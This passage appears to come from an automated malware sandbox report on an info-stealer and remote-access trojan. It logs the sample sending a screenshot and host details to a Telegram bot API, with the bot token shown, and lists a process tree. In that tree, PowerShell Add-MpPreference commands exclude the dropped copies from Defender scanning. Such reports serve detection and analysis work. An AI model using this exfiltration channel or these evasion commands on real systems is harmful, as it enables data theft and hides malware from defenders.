                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
                                                                                                                                    2024-04-19 11:41:59 UTC3INData Raw: 55 53 0a
                                                                                                                                    Data Ascii: US


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.449732149.154.167.2204436988C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-19 11:42:00 UTC256OUTPOST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1
                                                                                                                                    Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"
                                                                                                                                    Host: api.telegram.org
                                                                                                                                    Content-Length: 100984
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-19 11:42:00 UTC40OUTData Raw: 2d 2d 33 37 35 61 38 32 61 39 2d 34 33 34 63 2d 34 33 64 30 2d 38 64 32 35 2d 63 30 63 63 64 38 31 36 63 63 65 32 0d 0a
                                                                                                                                    Data Ascii: --375a82a9-434c-43d0-8d25-c0ccd816cce2
                                                                                                                                    2024-04-19 11:42:00 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                                    Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                                    2024-04-19 11:42:00 UTC10OUTData Raw: 37 31 36 32 36 34 39 32 32 36
                                                                                                                                    Data Ascii: 7162649226
                                                                                                                                    2024-04-19 11:42:00 UTC131OUTData Raw: 0d 0a 2d 2d 33 37 35 61 38 32 61 39 2d 34 33 34 63 2d 34 33 64 30 2d 38 64 32 35 2d 63 30 63 63 64 38 31 36 63 63 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                                    Data Ascii: --375a82a9-434c-43d0-8d25-c0ccd816cce2Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                                    2024-04-19 11:42:00 UTC102OUTData Raw: 49 44 3a 20 37 36 61 31 39 35 36 66 62 32 38 64 63 37 30 31 35 64 36 64 30 33 66 30 66 36 30 33 30 38 30 30 62 39 37 32 63 61 36 62 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 30 36 35 33 36 37 0a 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                                    Data Ascii: ID: 76a1956fb28dc7015d6d03f0f6030800b972ca6bUsername: userPC Name: 065367IP: 81.181.57.52GEO: US
                                                                                                                                    2024-04-19 11:42:00 UTC146OUTData Raw: 0d 0a 2d 2d 33 37 35 61 38 32 61 39 2d 34 33 34 63 2d 34 33 64 30 2d 38 64 32 35 2d 63 30 63 63 64 38 31 36 63 63 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                                    Data Ascii: --375a82a9-434c-43d0-8d25-c0ccd816cce2Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                                    2024-04-19 11:42:00 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                                    2024-04-19 11:42:00 UTC4096OUTData Raw: fc 8d d7 9f 48 ff 00 f4 05 ad f2 fa 91 96 26 31 86 c9 3f f8 73 93 35 84 a3 84 94 a7 bb 6b fe 18 e7 69 29 68 af a3 3e 48 4a 28 34 77 a0 66 bf 83 ff 00 e4 7b d1 ff 00 ed b7 fe 8a 6a f5 3d 77 45 1a dd b4 31 1b a9 2d cc 32 f9 aa c8 a0 f3 82 3a 1e 3b e4 1e c4 03 5e 59 e0 ff 00 f9 1e f4 7f fb 6d ff 00 a2 9a bd 4b c5 11 4b 3f 84 75 a8 60 8d e4 9a 4b 09 d1 11 14 96 66 31 b0 00 01 d4 93 5f 17 98 c5 4b 19 59 3e eb ff 00 49 89 fa 46 5b 52 54 b2 fc 24 e0 ec d4 65 ff 00 a7 2a 16 34 9d 26 d3 45 d3 d2 ca cd 0a c6 b9 25 98 e5 9d 8f 56 63 dc 9a bd 5e 4d 75 e1 8b 8b 09 ac 5a f3 4a 6b 88 a5 8a e9 a3 b4 d3 e1 79 23 b5 91 a3 85 50 03 81 b0 92 ac d9 f9 40 24 d6 ef 81 f4 0d 4a d3 56 d4 35 0d 5a 0b 7f b5 6f 11 34 f2 40 de 7c 8d e5 45 b9 96 4c e0 c6 48 6e 83 ae 79 ed 5c a9 24 ac
                                                                                                                                    Data Ascii: H&1?s5ki)h>HJ(4wf{j=wE1-2:;^YmKK?u`Kf1_KY>IF[RT$e*4&E%Vc^MuZJky#P@$JV5Zo4@|ELHny\$
                                                                                                                                    2024-04-19 11:42:00 UTC4096OUTData Raw: c9 8b b4 49 ff 00 7c 8a d2 9e 57 cb 15 1e 6e a9 fd df f0 c4 54 ce 39 a6 e5 c9 d1 ad de ce ff 00 e6 65 3d d2 5f 49 a0 c1 34 cb 14 36 ca 7e d8 fe 5b 1d af bb 62 b9 fe f9 11 24 63 8f 4c 75 cd 58 8f 54 b2 75 18 be 4f 30 c4 cc 13 c8 7e 5c 3e d5 4c fb af cd 9e 83 a7 5a d0 d9 1f fc f3 4f ca 93 c8 83 39 f2 90 7d 14 56 f4 f0 72 a4 ad 4e 56 bb 6f ef 39 6a e3 e1 59 de ac 2f 64 92 d5 f4 1a a7 2a 0f a8 cd 65 4f a9 dd a5 85 85 a5 92 58 48 d6 d6 d3 09 85 ce 9f 14 cc ac d3 3b 00 1a 48 c9 c6 d2 0e 01 c7 3e b5 b3 b3 d0 8a 67 94 01 27 60 e7 af 15 ae 23 0c ab f2 f3 74 77 fc 0c b0 98 c9 61 f9 b9 56 e6 26 a3 71 69 71 ab f8 b2 e7 cf 11 db ea 88 f1 c1 37 92 e7 3b a7 8d b2 54 0c 8f 95 49 e4 76 a7 ea 17 7a 5d d5 ae b1 1d 95 a5 fd b8 91 22 fb 0c d3 dc 79 91 93 6f 85 8c 08 d6 25 29
                                                                                                                                    Data Ascii: I|WnT9e=_I46~[b$cLuXTuO0~\>LZO9}VrNVo9jY/d*eOXH;H>g'`#twaV&qiq7;TIvz]"yo%)
                                                                                                                                    2024-04-19 11:42:00 UTC4096OUTData Raw: 5a 57 30 a1 66 b7 21 8e d0 fc 63 e6 dd eb d7 af 5a f9 aa d5 54 27 14 dd 8f b3 c0 e0 de 23 0f 5a 51 8d da b5 bd 6f fe 5f e5 d4 f5 67 45 91 19 1d 43 23 0c 32 b0 c8 23 d0 d7 8b f8 97 46 8f c3 fe 28 96 c6 d8 9f b2 4b 08 b8 89 09 ce c0 49 04 7d 32 0f e9 5e ad a6 78 82 c7 55 b8 92 da 03 2a 5c 46 82 46 8a 68 ca 36 d3 d1 86 7a 8f a5 79 ef c4 4f f9 1d 20 ff 00 b0 72 ff 00 e8 c7 ae ec 14 ff 00 da a9 4a 0f ad bf cd 1e 66 32 94 a3 82 c4 51 ab 1f b1 7b 3e ea cd 3f 5f 3e cf cc e6 a8 e2 96 93 8a fb 7b 9f 98 05 14 51 40 17 bc 2f af 69 9a 6f 89 2d 2e ae ee 7c b8 23 df b9 b6 33 63 28 c0 70 06 7a 91 5e 91 ff 00 0b 23 c2 7f f4 16 ff 00 c9 79 7f f8 9a f2 3d 1f 41 b4 d5 3c 2b ad df f9 93 0b ed 3c 24 88 81 86 c6 42 79 c8 c6 78 01 bb fa 56 b6 b1 e0 58 ac 7c 27 a5 6a 36 d2 cc f7
                                                                                                                                    Data Ascii: ZW0f!cZT'#ZQo_gEC#2#F(KI}2^xU*\FFh6zyO rJf2Q{>?_>{Q@/io-.|#3c(pz^#y=A<+<$ByxVX|'j6
                                                                                                                                    2024-04-19 11:42:00 UTC25INHTTP/1.1 100 Continue
                                                                                                                                    2024-04-19 11:42:01 UTC1520INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:01 GMT
                                                                                                                                    Content-Type: application/json
                                                                                                                                    Content-Length: 1131
                                                                                                                                    Connection: close
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                    {"ok":true,"result":{"message_id":315,"from":{"id":6499149886,"is_bot":true,"first_name":"safaryarybot","username":"safaryarybot"},"chat":{"id":7162649226,"first_name":"ROOT","username":"almanroot","type":"private"},"date":1713526921,"photo":[{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADcwADNAQ","file_unique_id":"AQADj8ExG1DNEVF4","file_size":1202,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADbQADNAQ","file_unique_id":"AQADj8ExG1DNEVFy","file_size":16115,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADeAADNAQ","file_unique_id":"AQADj8ExG1DNEVF9","file_size":68054,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADeQADNAQ","file_unique_id":"AQADj8ExG1DNEVF-","file_size":100422,"width":1280,"height":1024}],"caption":"ID: 76a1956fb28dc7015d6d03f0f6030800b972ca6b\nUsername: user\nPC Name: 065367\nIP: 81.181.57.52\nGEO: US","caption_entities":[{"offset":81,"length":12,"type":"url"}]}}


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.44974934.117.186.1924436756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-19 11:42:37 UTC61OUTGET /ip HTTP/1.1
                                                                                                                                    Host: ipinfo.io
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-19 11:42:37 UTC361INHTTP/1.1 200 OK
                                                                                                                                    server: nginx/1.24.0
                                                                                                                                    date: Fri, 19 Apr 2024 11:42:37 GMT
                                                                                                                                    content-type: text/plain; charset=utf-8
                                                                                                                                    Content-Length: 12
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                    via: 1.1 google
                                                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
                                                                                                                                    2024-04-19 11:42:37 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                                                                    Data Ascii: 81.181.57.52


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.44975034.117.186.1924436756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-19 11:42:38 UTC42OUTGET /country HTTP/1.1
                                                                                                                                    Host: ipinfo.io


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:13:41:53
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\user\Desktop\W4tW72sfAD.exe"
                                                                                                                                    Imagebase:0xa10000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:13:41:56
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                                                                                                                                    Imagebase:0x7ff791fa0000
                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:13:41:56
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:13:41:56
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
                                                                                                                                    Imagebase:0x7ff6f4260000
                                                                                                                                    File size:52'744 bytes
                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Imagebase:0xb90000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Imagebase:0x380000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:21
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Imagebase:0xed0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:22
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Imagebase:0x60000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:23
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:25
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:29
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:30
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:31
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:32
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:33
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                                                                                                                                    Imagebase:0x7ff7a5cb0000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:34
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
